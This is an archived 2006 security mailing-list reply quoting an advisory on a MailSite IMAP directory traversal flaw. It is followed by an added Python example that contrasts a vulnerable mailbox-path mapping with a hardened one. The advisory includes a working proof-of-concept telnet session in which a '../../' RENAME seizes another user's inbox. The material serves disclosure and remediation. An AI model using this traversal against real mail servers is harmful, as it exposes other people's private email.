Message-ID: <Pine.LNX.4.61.0601050650440.6775@zur>
Date: Thu, 5 Jan 2006 06:51:07 -0500 (EST)
From: Josh Zlatin <jzlatin@...at.cc>
To: Stan Bubrouski <stan.bubrouski@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Rockliffe Directory Transversal Vulnerability


On Wed, 4 Jan 2006, Stan Bubrouski wrote:

> Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
> (think uw-imapd for example) I think I would categorize this as more
> of a permissions problem.

The Mailsite IMAP server needs to run as the local system account. The
IMAP server cannot run as a regular user. Removing write permissions
from the individual IMAP accounts has no effect in stopping users
from stealing directories (such as INBOX) from other accounts.

--
   - Josh

>
> -sb
>
> On 1/4/06, Josh Zlatin <jzlatin@...at.cc> wrote:
>> Synopsis: Rockliffe's Mailsite IMAP Directory Traversal Vulnerability.
>>
>> Product: Rockliffe Mailsite
>>          http://www.rockliffe.com
>>
>> Version: Confirmed on Mailsite < 6.1.22.1
>>
>> Author: Josh Zlatin-Amishav
>>
>> Date: January 4, 2006
>>
>> Background:
>> Rockliffe MailSite secure email server software and MailSite MP secure email
>> gateways provide email server solutions and gateway email protection for
>> businesses and service providers. Rockliffe has more than 3,000 customers
>> hosting more than 15 million mailboxes worldwide.
>>
>> Issue:
>> In working with researchers at Tenable Network Security, I have come across
>> a directory traversal flaw in the IMAP server. It is possible for an
>> authenticated user to access any user's inbox via a RENAME command.
>>
>> PoC:
>>
>> josh@...1:~$ telnet 10.0.0.5 143
>> Trying 10.0.0.5...
>> Connected to 10.0.0.5.
>> Escape character is '^]'.
>> * OK  MailSite IMAP4 Server 6.1.22.0 ready
>> a1 login joe pass
>> a1 OK LOGIN completed
>> a2 rename ../../josh/INBOX gotcha
>> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
>> a3 select gotcha
>> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
>> * 0 EXISTS
>> * 0 RECENT
>> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
>> * OK [UNSEEN 0]
>> * OK [UIDVALIDITY 514563061] UIDs are valid
>> a3 OK [READ-WRITE] opened gotcha
>>
>> user joe can now access the contents of user josh's INBOX directory.
>>
>> Vendor notified: January 3, 2006 06:12AM
>>
>> Vendor Response:
>> Contact your sales rep about purchasing Mailsite 7.0.3.1
>>
>> Solution:
>> Mailsite fixed a buffer overrun in the Mailsite IMAP server which also fixes
>> the directory traversal problem. Either upgrade to version 6.1.22 and install
>> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
>> Mailsite. The hotfix can be obtained at:
>>
>> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>>
>> References: http://www.rockliffe.com
>> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
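The root cause in the quoted PoC is an IMAP server that splices a client-supplied mailbox name ("../../josh/INBOX") straight into a filesystem path, and, as the reply notes, file permissions cannot compensate when the service itself runs as LocalSystem. The following is an added example, written for this archive page and not code from the advisory or from MailSite, showing the naive mapping beside a hardened one. It assumes a constructed store layout (one directory per user under a common root, '/' as the IMAP hierarchy delimiter, as in the posted RENAME) and illustrative function names; the rejection of '\' is there because the product is a Windows server, where the backslash also traverses.

```python
import posixpath

# Constructed layout, assumed for this example only: one directory per user
# under a common mail store root, mailboxes as subdirectories, '/' as the
# IMAP hierarchy delimiter (the separator used in the posted RENAME).
MAIL_STORE = "/var/mailsite/store"


def mailbox_path_naive(user, mailbox):
    """Vulnerable mapping (illustrative): the client-supplied mailbox name is
    joined onto the user's directory as-is, so '..' components walk out of it.
    Note that normpath() resolves the traversal rather than stopping it."""
    return posixpath.normpath(posixpath.join(MAIL_STORE, user, mailbox))


class MailboxNameError(ValueError):
    """Raised for any mailbox name that does not map inside the user's store."""


def mailbox_path_safe(user, mailbox):
    """Hardened mapping: refuse rather than 'clean' suspicious names, then
    verify the resolved path is still inside the user's own root."""
    user_root = posixpath.join(MAIL_STORE, user)
    # Reject empty names, NUL bytes, backslashes (a Windows server would treat
    # them as separators), absolute names, and any '.' / '..' / empty component.
    if not mailbox or "\0" in mailbox or "\\" in mailbox or mailbox.startswith("/"):
        raise MailboxNameError(mailbox)
    parts = mailbox.split("/")
    if any(p in ("", ".", "..") for p in parts):
        raise MailboxNameError(mailbox)
    path = posixpath.normpath(posixpath.join(user_root, *parts))
    # Belt and braces: the containment check catches anything the component
    # filter above did not anticipate.
    if posixpath.commonpath([user_root, path]) != user_root:
        raise MailboxNameError(mailbox)
    return path


def rename_is_allowed(user, src, dst):
    """What a RENAME handler should ask before touching the filesystem: do both
    the source and the destination names map inside the caller's own store?"""
    try:
        mailbox_path_safe(user, src)
        mailbox_path_safe(user, dst)
    except MailboxNameError:
        return False
    return True


if __name__ == "__main__":
    # The posted exploit, replayed against both mappings.
    print("naive :", mailbox_path_naive("joe", "../../josh/INBOX"))
    print("safe  :", rename_is_allowed("joe", "../../josh/INBOX", "gotcha"))
    print("normal:", rename_is_allowed("joe", "INBOX", "old-inbox"))
```

The design point is to validate the mailbox name as a name (a list of components, none of them '.' or '..') and only then build a path; running the service as a low-privilege account is still worth doing, but as defence in depth rather than as the fix.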